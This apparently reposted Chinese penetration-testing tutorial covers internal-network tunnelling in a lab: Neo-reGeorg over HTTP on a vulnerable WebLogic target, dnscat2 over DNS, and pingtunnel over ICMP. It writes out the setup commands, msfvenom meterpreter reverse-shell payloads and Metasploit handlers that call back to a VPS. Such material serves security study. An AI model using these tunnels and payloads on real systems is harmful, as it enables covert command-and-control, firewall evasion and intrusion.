内网隧道—HTTP\DNS\ICMP

       本文仅限于安全研究和学习,用户承担因使用此工具而导致的所有法律和相关责任! 作者不承担任何法律和相关责任!

HTTP隧道

Neo-reGeorg

Neo-reGeorg 是一个旨在积极重构 reGeorg 的项目,目的是:

提高可用性,避免特征检测
提高 tunnel 连接安全性
提高传输内容保密性
应对更多的网络环境场景下使用

靶场环境:cve-2017-10271  weblogic

#靶场攻击过程,使用脚本工具得到shell,在此略过

1.设置密码生成 tunnel.(aspx|ashx|jsp|jspx|php) 并上传到WEB服务器

 2.使用蚁剑上传JSP文件

上传至此目录:可以访问到文件

/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/

3.使用 neoreg.py 连接WEB服务器,在本地建立 socks 代理,代理默认端口 1080

修改配置文件:vim proxychains4.conf

 执行命令:

 #测试代理: proxychains curl 127.0.0.1:7001

DNS隧道

Dnscat2

       dnscat2是一个DNS隧道工具,通过DNS协议创建加密的命令和控制通道,它的一大
特色就是服务端会有一个命令行控制台,所有的指令都可以在该控制台内完成。包
括:文件上传、下载、反弹Shell。
直连模式:客户端直接向指定IP的恶意DNS服务器发起DNS解析请求。

中继模式:像我们平时上网一样,DNS解析先经过互联网的迭代解析,最后指向我们
的恶意DNS服务器。相比直连,速度较慢,但是更安全。

服务端安装

apt install ruby ruby-dev git make g++ ruby-bundler
gem install bundler

git clone https://github.com/iagox86/dnscat2.git(也可以先下载文件,然后上传至VPS)
cd dnscat2/server
bundle install   #如此命令报错,和本地网络有关,多试几次


客户端编译

Linux:

git clone https://github.com/iagox86/dnscat2.git  
cd dnscat2/client/
make  

Windows:

下载Windows版本

在本地编译上传

上传已经编译好的 .exe程序

make编译之后会在此目录下生成一个dnscat可执行二进制文件。
Linux systemd-resolve占用53端口的解决方法: https://www.itren.org/319.html

Dnscat2直连模式

启动服务端

ruby ./dnscat2.rb

 启动客户端

 vps收到会话

help

windows

 进入session 1: session -i 1

shell    #获取主机shell

进入session 2 : session -i 2

 执行命令:

whoami

 直连模式流量特征:tcpdump udp dst port 53

Dnscat2中继模式

环境准备: 
1. 一台公网C&C服务器      
2. 一台内网靶机              #以win7为例
3. 一个可配置解析的域名

配置DNS域名解析:
创建A记录,将自己的域名解析服务器(ns.hack.com)指向云服务器(VPS IP)

A类解析是在告诉域名系统,ns.hacker.com的IP地址是 xxx.xxx.xxx.xxx

创建NS记录,将子域名 dns.hetian.cn 的DNS解析交给 ns.hack.com
NS解析是在告诉域名系统,想要知道 dns.hack.com 的IP地址,就去问ns.hacker.com 

 vps防火墙设置:开放全部UDP端口

启动服务端

ruby ./dnscat2.rb dns.xxx.xxx --secret=abcd

secret --指定密码

启动客户端

server #指定VPS地址

服务端收到session 3

获取shell

进入会话:session -i 4

执行命令: whoami

 

ICMP隧道

Pingtunnel

ICMP隧道
      通过某种信道获取了内网主机的shell,但是当前信道不适合做远控的通信信道,
tcp 和 udp 等传输层协议不能出网, dns 、 http 等应用层协议也不能出网,只有
icmp 协议可以出网。

目的:上线仅icmp协议出网的内网主机

ICMP隧道转发TCP上线MSF

1.VPS启动ICMP隧道服务端

./pingtunnel -type server -noprint 1 -nolog 1

2.靶机启动ICMP隧道客户端

pingtunnel.exe -type client -l 127.0.0.1:9999 -s vpsip -t vpsip:7777 -tcp 1 -noprint 1 -nolog 1


3. MSF 生成反弹 shell 的 payload 上传到靶机

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=127.0.0.1 lport=9999 -f exe > hot.exe

 4.执行 payload 反弹 shell 到 MSF

设置侦听:

msfconsole

use exploit/multi/handler

set lhost xx.xx.xx.xx   (vps的内网IP)

set lport 8866

set payload windows/x64/meterpreter/reverse_tcp

exploit

5. 靶机执行payload,msf上线

 

ICMP隧道转发Socks上线MSF

1. VPS启动ICMP隧道服务端

./pingtunnel -type server -noprint 1 -nolog 1

2.靶机启动ICMP隧道客户端

pingtunnel.exe -type client -l 127.0.0.1:9999 -s VPSIP -sock5 1 -noprint 1 -nolog 1

#  icmp隧道客户端监听127.0.0.1:9999启动socks5服务,
    通过连接到VPS IP的icmp隧道,
    由icmpserver转发socks5代理请求到目的地址 VPSIP:8899

3.MSF 生成反弹 shell 的 payload 上传到靶机,并执行

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=VPSIP lport=8866 HttpProxyType=SOCKS HttpProxyHost=127.0.0.1 HttpProxyPort=9999 -f exe > c2.exe

 5.设置侦听

handler -p windows/x64/meterpreter/reverse_tcp -H xx.xx.xx.xx -P8866

#IP是vps的内网IP

 6.MSF收到会话

 可以执行命令

参考:

内网渗透之内网穿透 - 先知社区

...

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/61546.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

innovus 报告多边形floorplan的boundary坐标

我正在「拾陆楼」和朋友们讨论有趣的话题,你⼀起来吧? 拾陆楼知识星球 历史文章: 常用dbGet命令 dbGet快速入门 使用"Cut Rectilinear"功能可以​调整floorplan形状,使其变成非矩形多边形(polygon)。​ …

前端面试自我介绍

前端面试自我介绍精选篇1 各位面试官大家好,我叫__,就读于__大学__学,大学本科学历,我的求职意向是与金融专业相关的职位,本人拥有较强的学习能力,能快速适应工作环境,兴趣爱好广泛&#xff0c…

计算机服务器被360后缀勒索病毒攻击怎么办,勒索病毒解密

计算机技术的不断发展,不仅方便了企业的生产生活,也为社会的发展带来了巨大贡献,但随之而来的网络威胁也不断增加,勒索病毒就是其中较为常见的常见的威胁。近期,我们收到很多企业的求助,企业的计算机服务器…

Stable Diffusion - 幻想 (Fantasy) 风格与糖果世界 (Candy Land) 的人物图像提示词配置

欢迎关注我的CSDN:https://spike.blog.csdn.net/ 本文地址:https://spike.blog.csdn.net/article/details/132212193 图像由 DreamShaper8 模型生成,融合糖果世界。 幻想 (Fantasy) 风格图像是一种以想象力为主导的艺术形式,创造了…

Android:换肤框架Android-Skin-Support

gihub地址:https://github.com/ximsfei/Android-skin-support 样例: 默认: 更换后: 一、引入依赖: // -- 换肤依赖implementation skin.support:skin-support:4.0.5// skin-supportimplementation skin.support:ski…

Spring MVC程序开发

目录 1. 什么是Spring MVC? 1.1 什么是MVC 1.2 MVC和Spring MVC 的关系 1.3 为什么要学Spring MVC? 2. Spring MVC的使用 2.1 Spring MVC的创建和连接 2.1.1 项目创建 2.1.2 项目连接 2.1.2.1 连接 2.1.2.2 RequestMapping注解介绍 2.1.2.3 GetMapping和 PostMapping 2.2 获取…

17.电话号码的字母组合(回溯)

目录 一、题目 二、代码 一、题目 17. 电话号码的字母组合 - 力扣(LeetCode) 二、代码 class Solution {const char*data[10]{"","","abc","def","ghi","jkl","mno","pq…

鸿蒙边缘计算网关正式开售

IDO-IPC3528鸿蒙边缘计算网关基于RK3568研发设计,采用22nm先进工艺制程,四核A55 CPU,主频高达2.0GHz,支持高达8GB高速LPDDR4,1T算力NPU,4K H.265/H264硬解码;视频输出接口HDMI2.0,双…

OpenMV 自适应颜色阈值

目录 演示视频 思路讲解 OprnMV代码 演示视频 备战2023电赛~openmv自适应颜色阈值(附源代码网盘链接) 思路讲解 1. 参考openmv官方例程讲解10-Color-Tracking->image_statistics_info图像统计信息https://book.openmv.cc/example/10-Color-Trackin…

https的原理和方案

文章目录 https原理为什么要加密常见的加密方式对称加密非对称加密数据摘要&&数据指纹数据签名 https的几种工作方案方案一:只使用对称加密方案二:只使用非对称加密方案三:两端都使用非对称加密方案四:非对称加密 对称加…

前端项目环境变量如何配置?

我们在项目开发过程中,至少会经历开发环境、测试环境和生产环境三个阶段。不同阶段请求的状态(如接口地址等)不尽相同,若手动切换接口地址是相当繁琐切容易出错的。于是环境变量配置的需求就应运而生,我们只需做简单的…

花费7元训练自己的GPT 2模型

在上一篇博客中,我介绍了用Tensorflow来重现GPT 1的模型和训练的过程。这次我打算用Pytorch来重现GPT 2的模型并从头进行训练。 GPT 2的模型相比GPT 1的改进并不多,主要在以下方面: 1. GPT 2把layer normalization放在每个decoder block的前…